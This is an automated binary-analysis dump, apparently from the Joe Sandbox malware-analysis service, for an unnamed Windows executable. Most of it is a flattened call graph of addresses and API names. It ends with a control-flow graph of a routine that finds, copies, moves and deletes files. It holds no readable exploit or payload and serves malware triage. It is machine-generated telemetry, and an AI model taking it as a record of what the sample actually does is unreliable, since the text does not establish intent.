83106 414d04 __fread_nolock 61 API calls 83105->83106 83106->83107 83107->83078 83109 4135bb _malloc 46 API calls 83108->83109 83110 432150 83109->83110 83111 4135bb _malloc 46 API calls 83110->83111 83112 432162 83111->83112 83113 4135bb _malloc 46 API calls 83112->83113 83114 432174 83113->83114 83115 4320f8 46 API calls 83114->83115 83116 432189 83114->83116 83117 432198 83115->83117 83116->83088 83117->83088 83119 44b18e 83118->83119 83123 44b0da 83118->83123 83139 43206e 83119->83139 83121 442caf 61 API calls 83121->83123 83123->83119 83123->83121 83126 44b19d 83123->83126 83135 442d48 83123->83135 83143 44b040 61 API calls 83123->83143 83126->83096 83128 43210f 83127->83128 83129 432109 83127->83129 83131 413748 _free 46 API calls 83128->83131 83133 432122 83128->83133 83130 413748 _free 46 API calls 83129->83130 83130->83128 83131->83133 83132 413748 _free 46 API calls 83134 432135 83132->83134 83133->83132 83133->83134 83134->83100 83134->83102 83136 442dbd 83135->83136 83137 442d60 83135->83137 83136->83137 83144 4320a4 83136->83144 83137->83123 83140 432092 83139->83140 83141 43207f 83139->83141 83140->83096 83142 4142b6 79 API calls 83141->83142 83142->83140 83143->83123 83145 4320e6 83144->83145 83146 4320cf 83144->83146 83145->83136 83148 4142b6 83146->83148 83149 4142c2 __tzset_nolock 83148->83149 83150 4142f2 83149->83150 83151 4142da 83149->83151 83152 4142ea __tzset_nolock 83149->83152 83154 415471 __lock_file 47 API calls 83150->83154 83153 417f77 __read_nolock 46 API calls 83151->83153 83152->83145 83155 4142df 83153->83155 83156 4142fa 83154->83156 83157 417f25 __read_nolock 10 API calls 83155->83157 83158 41415f 77 API calls 83156->83158 83157->83152 83159 41430f 83158->83159 83160 414326 LeaveCriticalSection LeaveCriticalSection 83159->83160 83160->83152 83161->82406 83162->82410 83163->82414 83164->82423 83165->82425 83166->82425 83216 410160 83167->83216 83169 41012f GetFullPathNameW 83170 410147 ctype 83169->83170 83170->82270 83172 4102cb SHGetDesktopFolder 83171->83172 83175 410333 _wcsncpy 83171->83175 83173 4102e0 _wcsncpy 83172->83173 83172->83175 83174 41031c SHGetPathFromIDListW 83173->83174 83173->83175 83174->83175 83175->82273 83177 4101bb 83176->83177 83184 425f4a 83176->83184 83178 410160 52 API calls 83177->83178 83179 4101c7 83178->83179 83220 410200 52 API calls 2 library calls 83179->83220 83180 4114ab __wcsicoll 58 API calls 83180->83184 83182 4101d6 83221 410200 52 API calls 2 library calls 83182->83221 83183 425f6e 83183->82275 83184->83180 83184->83183 83186 4101e9 83186->82275 83188 40f760 128 API calls 83187->83188 83189 40f584 83188->83189 83190 429335 83189->83190 83191 40f58c 83189->83191 83194 4528bd 118 API calls 83190->83194 83192 40f598 83191->83192 83193 429358 83191->83193 83222 4033c0 113 API calls 7 library calls 83192->83222 83223 434034 86 API calls _wprintf 83193->83223 83195 42934b 83194->83195 83198 429373 83195->83198 83199 42934f 83195->83199 83203 4115d7 52 API calls 83198->83203 83202 431e58 82 API calls 83199->83202 83200 429369 83200->83198 83201 40f5b4 83201->82271 83202->83193 83212 4293c5 ctype 83203->83212 83204 42959c 83205 413748 _free 46 API calls 83204->83205 83206 4295a5 83205->83206 83207 431e58 82 API calls 83206->83207 83208 4295b1 83207->83208 83212->83204 83213 401b10 52 API calls 83212->83213 83224 444af8 52 API calls _memmove 83212->83224 83225 44c7dd 64 API calls 3 library calls 83212->83225 83226 44b41c 52 API calls 83212->83226 83227 402780 52 API calls 2 library calls 83212->83227 83228 4022d0 52 API calls ctype 83212->83228 83213->83212 83217 410167 _wcslen 83216->83217 83218 4115d7 52 API calls 83217->83218 83219 41017e _wcscpy 83218->83219 83219->83169 83220->83182 83221->83186 83222->83201 83223->83200 83224->83212 83225->83212 83226->83212 83227->83212 83228->83212 83230 402539 ctype 83229->83230 83231 402417 83229->83231 83230->82279 83231->83230 83232 4115d7 52 API calls 83231->83232 83233 402443 83232->83233 83234 4115d7 52 API calls 83233->83234 83235 4024b4 83234->83235 83235->83230 83258 402880 95 API calls 2 library calls 83235->83258 83259 4022d0 52 API calls ctype 83235->83259 83241 401566 83238->83241 83239 401794 83260 40e9a0 90 API calls 83239->83260 83241->83239 83243 4010a0 52 API calls 83241->83243 83244 40167a 83241->83244 83243->83241 83245 4017c0 83244->83245 83261 45e737 90 API calls 3 library calls 83244->83261 83245->82281 83247 40bc70 52 API calls 83246->83247 83248 40d451 83247->83248 83249 40d50f 83248->83249 83251 40d519 83248->83251 83254 401b10 52 API calls 83248->83254 83256 427c01 83248->83256 83262 40e0a0 52 API calls 83248->83262 83263 40f310 53 API calls 83248->83263 83264 40d860 91 API calls 83248->83264 83265 410600 52 API calls 83249->83265 83251->82284 83254->83248 83266 45e737 90 API calls 3 library calls 83256->83266 83258->83235 83259->83235 83260->83244 83261->83245 83262->83248 83263->83248 83264->83248 83265->83251 83266->83251 83267->82297 83268->82298 83270 42c5fe 83269->83270 83283 4091c6 83269->83283 83271 40bc70 52 API calls 83270->83271 83270->83283 83272 42c64e InterlockedIncrement 83271->83272 83273 42c665 83272->83273 83277 42c697 83272->83277 83275 42c672 InterlockedDecrement Sleep InterlockedIncrement 83273->83275 83273->83277 83274 42c737 InterlockedDecrement 83276 42c74a 83274->83276 83275->83273 83275->83277 83278 408f40 VariantClear 83276->83278 83277->83274 83299 42c731 83277->83299 83444 408e80 VariantClear 83277->83444 83279 42c752 83278->83279 83453 410c60 VariantClear ctype 83279->83453 83282 42c6cf 83445 45340c 83282->83445 83283->82343 83285 42c6db 83286 402160 52 API calls 83285->83286 83287 42c6e5 83286->83287 83288 45340c 85 API calls 83287->83288 83289 42c6f1 83288->83289 83290 40d200 52 API calls 83289->83290 83291 42c6fb 83290->83291 83451 465124 53 API calls 83291->83451 83293 42c715 83294 42c76a 83293->83294 83295 42c719 83293->83295 83296 401b10 52 API calls 83294->83296 83452 46fe32 VariantClear 83295->83452 83298 42c77e 83296->83298 83300 401980 53 API calls 83298->83300 83299->83274 83306 42c796 83300->83306 83301 42c812 83460 46fe32 VariantClear 83301->83460 83303 42c82a InterlockedDecrement 83461 46ff07 54 API calls 83303->83461 83305 42c864 83462 45e737 90 API calls 3 library calls 83305->83462 83306->83301 83306->83305 83454 40ba10 83306->83454 83307 42c9ec 83313 401980 53 API calls 83323 42c849 83313->83323 83315 408f40 VariantClear 83315->83323 83317 408f40 VariantClear 83320 42c891 83317->83320 83318 402780 52 API calls 83318->83323 83463 410c60 VariantClear ctype 83320->83463 83323->83307 83323->83313 83323->83315 83323->83318 83464 40a780 83323->83464 83324 42c874 83324->83317 83326 42ca59 83324->83326 83326->83326 83328 40afc4 83327->83328 83329 40b156 83327->83329 83330 40afd5 83328->83330 83331 42d1e3 83328->83331 83517 45e737 90 API calls 3 library calls 83329->83517 83336 40a780 389 API calls 83330->83336 83351 40b11a ctype 83330->83351 83518 45e737 90 API calls 3 library calls 83331->83518 83334 40b143 83334->82343 83335 42d1f8 83340 408f40 VariantClear 83335->83340 83338 40b00a 83336->83338 83338->83335 83341 40b012 83338->83341 83339 42d4db 83339->83339 83340->83334 83342 40b04a 83341->83342 83343 42d231 VariantClear 83341->83343 83346 40b094 ctype 83341->83346 83350 40b05c ctype 83342->83350 83519 40e270 VariantClear ctype 83342->83519 83343->83350 83344 40b108 83344->83351 83520 40e270 VariantClear ctype 83344->83520 83345 42d45a VariantClear 83345->83351 83346->83344 83347 42d425 ctype 83346->83347 83347->83345 83347->83351 83350->83346 83352 4115d7 52 API calls 83350->83352 83351->83334 83521 45e737 90 API calls 3 library calls 83351->83521 83352->83346 83354 408fff 83353->83354 83367 40900d 83353->83367 83522 403ea0 52 API calls __cinit 83354->83522 83357 42c3f6 83526 45e737 90 API calls 3 library calls 83357->83526 83359 40a780 391 API calls 83359->83367 83360 42c44a 83528 45e737 90 API calls 3 library calls 83360->83528 83362 42c47b 83529 451b42 61 API calls 83362->83529 83364 42c4cb 83531 47faae 391 API calls 83364->83531 83365 42c564 83370 408f40 VariantClear 83365->83370 83367->83357 83367->83359 83367->83360 83367->83362 83367->83364 83367->83365 83369 42c548 83367->83369 83373 409112 83367->83373 83374 42c528 83367->83374 83376 4090df 83367->83376 83381 4090ea 83367->83381 83387 4090f2 ctype 83367->83387 83525 4534e3 52 API calls 83367->83525 83527 40c4e0 391 API calls 83367->83527 83534 45e737 90 API calls 3 library calls 83369->83534 83370->83387 83371 42c491 83371->83387 83530 45e737 90 API calls 3 library calls 83371->83530 83372 42c4da 83372->83387 83532 45e737 90 API calls 3 library calls 83372->83532 83373->83369 83379 40912b 83373->83379 83533 45e737 90 API calls 3 library calls 83374->83533 83376->83381 83523 408e80 VariantClear 83376->83523 83379->83387 83524 403e10 53 API calls 83379->83524 83383 408f40 VariantClear 83381->83383 83383->83387 83385 40914b 83386 408f40 VariantClear 83385->83386 83386->83387 83387->82343 83535 408d90 83388->83535 83390 429778 83567 410c60 VariantClear ctype 83390->83567 83392 408cf9 83392->83390 83394 42976c 83392->83394 83396 408d2d 83392->83396 83393 429780 83566 45e737 90 API calls 3 library calls 83394->83566 83551 403d10 83396->83551 83399 408d71 ctype 83399->82343 83400 408f40 VariantClear 83401 408d45 ctype 83400->83401 83401->83399 83401->83400 83403 40d15f 83402->83403 83405 425c87 83402->83405 83403->82343 83404 425cc7 83405->83404 83406 425ca1 TranslateAcceleratorW 83405->83406 83406->83403 83408 42602f 83407->83408 83411 40d17f 83407->83411 83408->82343 83409 42608e IsDialogMessageW 83410 40d18c 83409->83410 83409->83411 83410->82343 83411->83409 83411->83410 83953 430c46 GetClassLongW 83411->83953 83413->82343 83414->82343 83415->82308 83416->82313 83417->82343 83418->82343 83419->82343 83420->82343 83421->82351 83422->82351 83423->82351 83424->82351 83425->82351 83426->82351 83428 443d51 83427->83428 83429 443d33 _wcslen 83427->83429 83955 433ee0 CreateToolhelp32Snapshot Process32FirstW 83428->83955 83429->83428 83432 443d41 83429->83432 83431 443d59 83431->82351 83954 433d9e 63 API calls 4 library calls 83432->83954 83434 443d49 83434->82351 83435->82351 83437 403cdf 83436->83437 83438 408f40 VariantClear 83437->83438 83439 403ce7 83438->83439 83439->82354 83440->82351 83441->82351 83442->82343 83443->82305 83444->83282 83446 453439 83445->83446 83447 453419 83445->83447 83446->83285 83448 45342f 83447->83448 83507 4531b1 85 API calls 5 library calls 83447->83507 83448->83285 83450 453425 83450->83285 83451->83293 83452->83299 83453->83283 83455 40ba49 83454->83455 83459 40ba1b ctype _memmove 83454->83459 83457 4115d7 52 API calls 83455->83457 83456 4115d7 52 API calls 83458 40ba22 83456->83458 83457->83459 83458->83306 83459->83456 83460->83303 83461->83323 83462->83324 83463->83283 83465 40a7a6 83464->83465 83507->83450 83517->83331 83518->83335 83519->83350 83520->83351 83521->83339 83522->83367 83523->83381 83524->83385 83525->83367 83526->83387 83527->83367 83528->83387 83529->83371 83530->83387 83531->83372 83532->83387 83533->83387 83534->83365 83536 4289d2 83535->83536 83537 408db3 83535->83537 83573 45e737 90 API calls 3 library calls 83536->83573 83568 40bec0 83537->83568 83540 4289e5 83574 45e737 90 API calls 3 library calls 83540->83574 83542 428a05 83544 408f40 VariantClear 83542->83544 83543 40ba10 52 API calls 83546 408dc9 83543->83546 83550 408e5a 83544->83550 83545 40a780 391 API calls 83545->83546 83546->83540 83546->83542 83546->83543 83546->83545 83547 408e64 83546->83547 83549 408f40 VariantClear 83546->83549 83546->83550 83548 408f40 VariantClear 83547->83548 83548->83550 83549->83546 83550->83392 83552 408f40 VariantClear 83551->83552 83553 403d20 83552->83553 83554 403cd0 VariantClear 83553->83554 83555 403d4d 83554->83555 83576 46e48d 83555->83576 83611 457e22 83555->83611 83614 466faf 83555->83614 83624 4755c4 83555->83624 83646 45c730 83555->83646 83673 40d3b0 83555->83673 83680 478656 83555->83680 83701 46e1a6 83555->83701 83747 457e3f 83555->83747 83556 403d76 83556->83390 83556->83401 83566->83390 83567->83393 83570 40bed0 83568->83570 83569 40bef2 83569->83546 83570->83569 83571 427ae9 83570->83571 83575 45e737 90 API calls 3 library calls 83570->83575 83571->83546 83573->83540 83574->83542 83575->83571 83758 4533eb 83576->83758 83580 46e4f1 83581 46e503 CoInitialize CoCreateInstance 83580->83581 83582 40d200 52 API calls 83580->83582 83583 46e557 83581->83583 83584 46e528 83581->83584 83582->83581 83586 45340c 85 API calls 83583->83586 83585 408f40 VariantClear 83584->83585 83587 46e530 CoUninitialize 83585->83587 83588 46e568 83586->83588 83589 46e54c 83587->83589 83590 46e58a 83588->83590 83591 45340c 85 API calls 83588->83591 83589->83556 83592 46e5ac 83590->83592 83593 45340c 85 API calls 83590->83593 83591->83590 83594 46e5ce 83592->83594 83595 45340c 85 API calls 83592->83595 83593->83592 83595->83594 83774 457c53 83611->83774 83613 457e3a 83613->83556 83615 45340c 85 API calls 83614->83615 83616 466fc3 83615->83616 83806 44bf8b 83616->83806 83618 466fc9 83619 466fd0 GetLastError 83618->83619 83623 466fed 83618->83623 83620 403cd0 VariantClear 83619->83620 83623->83556 83625 4755d1 __write_nolock 83624->83625 83626 40bc70 52 API calls 83625->83626 83627 4755e3 83626->83627 83628 4755fa CreateToolhelp32Snapshot Process32FirstW 83627->83628 83632 475624 _wcscat 83628->83632 83629 413a0e __wsplitpath 46 API calls 83629->83632 83630 45340c 85 API calls 83630->83632 83631 402160 52 API calls 83631->83632 83632->83629 83632->83630 83632->83631 83633 4114ab __wcsicoll 58 API calls 83632->83633 83634 4756a3 Process32NextW 83632->83634 83633->83632 83634->83632 83635 4756b9 CloseHandle 83634->83635 83821 40e830 53 API calls 83635->83821 83637 4756d3 83822 40cf00 53 API calls 83637->83822 83639 4756e0 83640 408f40 VariantClear 83639->83640 83645 4756ea 83640->83645 83651 45c754 83646->83651 83667 45c7f3 83646->83667 83647 45340c 85 API calls 83648 45c82f 83647->83648 83649 45340c 85 API calls 83648->83649 83650 45c836 83649->83650 83823 44bd27 83650->83823 83654 45340c 85 API calls 83651->83654 83651->83667 83656 45c795 83654->83656 83658 413a0e __wsplitpath 46 API calls 83656->83658 83659 45c79b 83658->83659 83660 401b10 52 API calls 83659->83660 83661 45c7ab 83660->83661 83662 40d200 52 API calls 83661->83662 83663 45c7b6 83662->83663 83663->83667 83851 4339fa 83663->83851 83667->83647 83668 45c802 83667->83668 83668->83556 83674 40d3c4 83673->83674 83675 40d3cc timeGetTime 83674->83675 83676 42e19d Sleep 83674->83676 83677 40d3e2 83675->83677 83678 4091e0 389 API calls 83677->83678 83679 40d3fb 83678->83679 83679->83556 83681 40e710 53 API calls 83680->83681 83682 478682 83681->83682 83683 4533eb 85 API calls 83682->83683 83684 478690 83683->83684 83878 4536f7 83684->83878 83687 40d200 52 API calls 83688 4787b4 GetDriveTypeW 83687->83688 83689 4786b7 _wcscpy 83688->83689 83689->83687 83691 478809 83689->83691 83700 478878 83689->83700 83881 443758 83689->83881 83887 40e680 83689->83887 83691->83700 83892 40e830 53 API calls 83691->83892 83693 47881c 83893 40cf00 53 API calls 83693->83893 83695 478829 83700->83556 83702 46e1c0 83701->83702 83703 4533eb 85 API calls 83702->83703 83705 46e1dc 83703->83705 83704 46e483 83704->83556 83705->83704 83706 46e2e7 83705->83706 83707 46e1e9 83705->83707 83709 40f760 128 API calls 83706->83709 83708 45340c 85 API calls 83707->83708 83722 46e1f4 _wcscat _wcscpy _wcschr 83708->83722 83710 46e2f7 83709->83710 83711 46e2fc 83710->83711 83712 46e30d 83710->83712 83713 403cd0 VariantClear 83711->83713 83714 45340c 85 API calls 83712->83714 83715 46e2bd 83713->83715 83716 46e332 83714->83716 83715->83704 83718 408f40 VariantClear 83715->83718 83717 413a0e __wsplitpath 46 API calls 83716->83717 83727 46e338 _wcscat _wcscpy 83717->83727 83719 46e2d0 83718->83719 83719->83556 83720 45340c 85 API calls 83721 46e264 _wcscpy 83720->83721 83724 433998 GetFileAttributesW 83721->83724 83723 45340c 85 API calls 83722->83723 83725 46e248 _wcscat 83722->83725 83723->83725 83726 46e27d _wcslen 83724->83726 83725->83720 83726->83715 83728 45340c 85 API calls 83726->83728 83730 45340c 85 API calls 83727->83730 83729 46e2b0 83728->83729 83732 46e3e3 83730->83732 83748 45340c 85 API calls 83747->83748 83749 457e61 83748->83749 83750 443d19 67 API calls 83749->83750 83751 457e67 83750->83751 83752 457e71 83751->83752 83753 457e9d 83751->83753 83754 408f40 VariantClear 83752->83754 83755 408f40 VariantClear 83753->83755 83756 457e76 83754->83756 83757 457ea2 83755->83757 83756->83556 83757->83556 83759 453404 83758->83759 83760 4533f8 83758->83760 83762 4426cd 83759->83762 83760->83759 83771 4531b1 85 API calls 5 library calls 83760->83771 83764 4426f5 _wcslen 83762->83764 83763 442866 83763->83580 83764->83763 83766 44272a 83764->83766 83768 4427b7 83764->83768 83765 4427b2 83765->83580 83766->83765 83772 40e790 59 API calls 83766->83772 83768->83765 83773 40e790 59 API calls 83768->83773 83771->83759 83772->83766 83773->83768 83775 40bc70 52 API calls 83774->83775 83776 457c64 setSBCS 83775->83776 83778 45340c 85 API calls 83776->83778 83789 457cac 83776->83789 83777 457cc7 83782 45340c 85 API calls 83777->83782 83786 457d01 setSBCS 83777->83786 83780 457c94 83778->83780 83779 45340c 85 API calls 83781 457cc0 83779->83781 83783 45340c 85 API calls 83780->83783 83780->83789 83784 410160 52 API calls 83781->83784 83791 457cdc 83782->83791 83785 457ca5 83783->83785 83784->83777 83787 410160 52 API calls 83785->83787 83788 45340c 85 API calls 83786->83788 83787->83789 83790 457d51 ShellExecuteExW 83788->83790 83789->83777 83789->83779 83793 457d73 ctype 83790->83793 83791->83786 83792 4533eb 85 API calls 83791->83792 83794 457cf8 83792->83794 83795 457dc7 83793->83795 83796 457d8d 83793->83796 83805 40e0a0 52 API calls 83794->83805 83797 457dcd 83795->83797 83799 408f40 VariantClear 83795->83799 83801 408f40 VariantClear 83796->83801 83797->83613 83800 457df4 83799->83800 83802 457da7 83800->83802 83803 457e08 CloseHandle 83800->83803 83801->83802 83802->83613 83805->83786 83807 410120 53 API calls 83806->83807 83808 44bfaa 83807->83808 83819 433998 GetFileAttributesW 83808->83819 83810 44bfb4 _wcscat 83811 413a0e __wsplitpath 46 API calls 83810->83811 83812 44bff4 FindFirstFileW 83811->83812 83813 44c092 FindClose 83812->83813 83814 44c013 83812->83814 83813->83618 83814->83813 83816 44c018 _wcscat _wcscpy 83814->83816 83815 44c06c FindNextFileW 83815->83814 83815->83816 83816->83814 83816->83815 83817 44c059 DeleteFileW 83816->83817 83817->83815 83818 44c083 FindClose 83817->83818 83818->83618 83820 4339aa 83819->83820 83820->83810 83821->83637 83822->83639 83824 44bd37 __write_nolock 83823->83824 83825 410120 53 API calls 83824->83825 83826 44bd4b 83825->83826 83827 410120 53 API calls 83826->83827 83828 44bd5a 83827->83828 83855 433908 83828->83855 83873 4339b6 GetFileAttributesW 83851->83873 83853 433a06 83853->83667 83856 413a0e __wsplitpath 46 API calls 83855->83856 83874 4339d2 FindFirstFileW 83873->83874 83875 4339f5 83873->83875 83876 4339e3 83874->83876 83877 4339ea FindClose 83874->83877 83875->83853 83876->83853 83877->83875 83879 4026f0 52 API calls 83878->83879 83880 453705 CharLowerBuffW 83879->83880 83880->83689 83882 443765 83881->83882 83883 443791 83882->83883 83895 4013a0 52 API calls 83882->83895 83883->83689 83885 443773 83886 4115d7 52 API calls 83885->83886 83886->83883 83888 40e687 83887->83888 83889 427616 83888->83889 83890 40c600 52 API calls 83888->83890 83891 40e69b 83890->83891 83891->83689 83892->83693 83893->83695 83895->83885 83953->83411 83954->83434 83962 433d5f 83955->83962 83957 433fbe CloseHandle 83957->83431 83958 433f30 Process32NextW 83958->83957 83959 433f1f _wcscat 83958->83959 83959->83957 83959->83958 83960 413a0e __wsplitpath 46 API calls 83959->83960 83961 4114ab __wcsicoll 58 API calls 83959->83961 83960->83959 83961->83959 83963 433d8b 83962->83963 83967 433d6e 83962->83967 83970 41319b 57 API calls __wcstoi64 83963->83970 83966 433d91 83966->83959 83967->83963 83968 433d98 83967->83968 83969 4131fc GetStringTypeW __towlower_l 83967->83969 83968->83959 83969->83967 83970->83966 83971 40b2b9 83974 40ccd0 83971->83974 83973 40b2c4 84014 40cc70 83974->84014 83976 40ccf3 83977 42c3bb 83976->83977 83978 40cd1b 83976->83978 83992 40cd8a ctype 83976->83992 84036 45e737 90 API calls 3 library calls 83977->84036 83983 40cd30 83978->83983 84003 40cdad 83978->84003 83980 40cd72 84024 402780 52 API calls 2 library calls 83980->84024 83983->83980 83983->83992 84023 402780 52 API calls 2 library calls 83983->84023 83984 40cd80 84025 40e7d0 391 API calls 83984->84025 83985 40ce40 84026 40ceb0 53 API calls 83985->84026 83988 40ce53 83989 408f40 VariantClear 83988->83989 83990 40ce5b 83989->83990 83993 408f40 VariantClear 83990->83993 83991 42c3a0 84034 45e737 90 API calls 3 library calls 83991->84034 83992->83973 83996 40ce63 83993->83996 83995 42c31a 84027 45e737 90 API calls 3 library calls 83995->84027 83996->83973 83998 42c3ad 84035 452670 VariantClear 83998->84035 83999 42c327 84028 452670 VariantClear 83999->84028 84001 40cc70 391 API calls 84001->84003 84003->83985 84003->83991 84003->83995 84003->84001 84004 42c335 84003->84004 84005 42c370 84003->84005 84009 42c343 84003->84009 84029 452670 VariantClear 84004->84029 84032 45e737 90 API calls 3 library calls 84005->84032 84008 42c392 84033 452670 VariantClear 84008->84033 84030 45e737 90 API calls 3 library calls 84009->84030 84012 42c362 84031 452670 VariantClear 84012->84031 84015 40a780 391 API calls 84014->84015 84016 40cc96 84015->84016 84017 42bd0e 84016->84017 84018 40cc9e 84016->84018 84019 408f40 VariantClear 84017->84019 84021 408f40 VariantClear 84018->84021 84020 42bd16 84019->84020 84020->83976 84022 40ccb8 84021->84022 84022->83976 84023->83983 84024->83984 84025->83992 84026->83988 84027->83999 84028->83992 84029->83992 84030->84012 84031->83992 84032->84008 84033->83992 84034->83998 84035->83992 84036->83992 84037 425b2b 84042 40f000 84037->84042 84041 425b3a 84043 4115d7 52 API calls 84042->84043 84044 40f007 84043->84044 84045 4276ea 84044->84045 84051 40f030 84044->84051 84050 41130a 51 API calls __cinit 84050->84041 84052 40f039 84051->84052 84054 40f01a 84051->84054 84081 41130a 51 API calls __cinit 84052->84081 84055 40e500 84054->84055 84056 40bc70 52 API calls 84055->84056 84057 40e515 GetVersionExW 84056->84057 84058 402160 52 API calls 84057->84058 84059 40e557 84058->84059 84082 40e660 84059->84082 84062 40e680 52 API calls 84063 40e566 84062->84063 84064 427674 84063->84064 84087 40ef60 84063->84087 84069 4276c6 GetSystemInfo 84064->84069 84067 40e5e0 84070 4276d5 GetSystemInfo 84067->84070 84091 40efd0 84067->84091 84068 40e5cd GetCurrentProcess 84098 40ef20 LoadLibraryA GetProcAddress 84068->84098 84069->84070 84074 40e629 84095 40ef90 84074->84095 84077 40e641 FreeLibrary 84078 40e644 84077->84078 84079 40e653 FreeLibrary 84078->84079 84080 40e656 84078->84080 84079->84080 84080->84050 84081->84054 84083 40e667 84082->84083 84084 42761d 84083->84084 84085 40c600 52 API calls 84083->84085 84086 40e55c 84085->84086 84086->84062 84088 40e5c8 84087->84088 84089 40ef66 LoadLibraryA 84087->84089 84088->84067 84088->84068 84089->84088 84090 40ef77 GetProcAddress 84089->84090 84090->84088 84092 40e620 84091->84092 84093 40efd6 LoadLibraryA 84091->84093 84092->84069 84092->84074 84093->84092 84094 40efe7 GetProcAddress 84093->84094 84094->84092 84099 40efb0 LoadLibraryA GetProcAddress 84095->84099 84097 40e632 GetNativeSystemInfo 84097->84077 84097->84078 84098->84067 84099->84097 84100 425b5e 84105 40c7f0 84100->84105 84104 425b6d 84140 40db10 52 API calls 84105->84140 84107 40c82a 84141 410ab0 6 API calls 84107->84141 84109 40c86d 84110 40bc70 52 API calls 84109->84110 84111 40c877 84110->84111 84112 40bc70 52 API calls 84111->84112 84113 40c881 84112->84113 84114 40bc70 52 API calls 84113->84114 84115 40c88b 84114->84115 84116 40bc70 52 API calls 84115->84116 84117 40c8d1 84116->84117 84118 40bc70 52 API calls 84117->84118 84119 40c991 84118->84119 84142 40d2c0 52 API calls 84119->84142 84121 40c99b 84143 40d0d0 53 API calls 84121->84143 84123 40c9c1 84124 40bc70 52 API calls 84123->84124 84125 40c9cb 84124->84125 84144 40e310 53 API calls 84125->84144 84127 40ca28 84128 408f40 VariantClear 84127->84128 84129 40ca30 84128->84129 84130 408f40 VariantClear 84129->84130 84131 40ca38 GetStdHandle 84130->84131 84132 429630 84131->84132 84133 40ca87 84131->84133 84132->84133 84134 429639 84132->84134 84139 41130a 51 API calls __cinit 84133->84139 84145 4432c0 57 API calls 84134->84145 84136 429641 84146 44b6ab CreateThread 84136->84146 84138 42964f CloseHandle 84138->84133 84139->84104 84140->84107 84141->84109 84142->84121 84143->84123 84144->84127 84145->84136 84146->84138 84147 44b5cb 58 API calls 84146->84147 84148 425b6f 84153 40dc90 84148->84153 84152 425b7e 84154 40bc70 52 API calls 84153->84154 84155 40dd03 84154->84155 84161 40f210 84155->84161 84158 40dd96 84159 40ddb7 84158->84159 84164 40dc00 52 API calls 2 library calls 84158->84164 84160 41130a 51 API calls __cinit 84159->84160 84160->84152 84165 40f250 RegOpenKeyExW 84161->84165 84163 40f230 84163->84158 84164->84158 84166 425e17 84165->84166 84167 40f275 RegQueryValueExW 84165->84167 84166->84163 84168 40f2c3 RegCloseKey 84167->84168 84169 40f298 84167->84169 84168->84163 84170 40f2a9 RegCloseKey 84169->84170 84171 425e1d 84169->84171 84170->84163

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 418 44bd27-44bd85 call 422240 call 410120 * 2 call 433908 call 433998 429 44bd87-44bd99 call 411536 418->429 430 44bd9c-44bdae call 433998 418->430 429->430 435 44bdc5-44be12 call 413a0e FindFirstFileW 430->435 436 44bdb0-44bdc2 call 411536 430->436 441 44be18 435->441 442 44bf7b-44bf8a FindClose 435->442 436->435 443 44be1e-44be23 441->443 443->442 444 44be29-44be31 443->444 445 44be37-44beac call 433784 call 411567 call 411536 * 2 call 4339fa 444->445 446 44bf5b-44bf6c FindNextFileW 444->446 458 44beae-44beb2 445->458 459 44bed9-44bedd 445->459 446->443 448 44bf72-44bf76 446->448 448->443 462 44beb4-44bec9 lstrcmpiW 458->462 463 44bf32-44bf41 FindClose 458->463 460 44bf1d-44bf2c CopyFileW 459->460 461 44bedf-44bee4 459->461 468 44bf2e-44bf30 460->468 466 44bee6-44bef9 MoveFileW 461->466 467 44befb-44bf0e CopyFileW 461->467 464 44bf42-44bf57 MoveFileW 462->464 465 44becb-44bed3 DeleteFileW 462->465 464->463 470 44bf59 464->470 465->459 466->468 467->463 469 44bf10-44bf1b DeleteFileW 467->469 468->463 468->470 469->468 470->446
          APIs
            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
            • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
            • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
            • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
          • _wcscat.LIBCMT ref: 0044BD94
          • _wcscat.LIBCMT ref: 0044BDBD
          • __wsplitpath.LIBCMT ref: 0044BDEA
          • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
          • _wcscpy.LIBCMT ref: 0044BE71
          • _wcscat.LIBCMT ref: 0044BE83
          • _wcscat.LIBCMT ref: 0044BE95
          • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
          • DeleteFileW.KERNEL32(?), ref: 0044BED3
          • MoveFileW.KERNEL32 ref: 0044BEF3
          • CopyFileW.KERNEL32 ref: 0044BF0A
          • DeleteFileW.KERNEL32(?), ref: 0044BF15
          • CopyFileW.KERNEL32 ref: 0044BF2C
          • FindClose.KERNEL32(00000000), ref: 0044BF33
          • MoveFileW.KERNEL32 ref: 0044BF4F
          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
          • FindClose.KERNEL32(00000000), ref: 0044BF7C
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
          • String ID: \*.*
          • API String ID: 2188072990-1173974218
          • Opcode ID: 357ebba7feebe16a22474f1d431f14773a19471a55875df3ad49b347cc0c72ad
          • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
          • Opcode Fuzzy Hash: 357ebba7feebe16a22474f1d431f14773a19471a55875df3ad49b347cc0c72ad
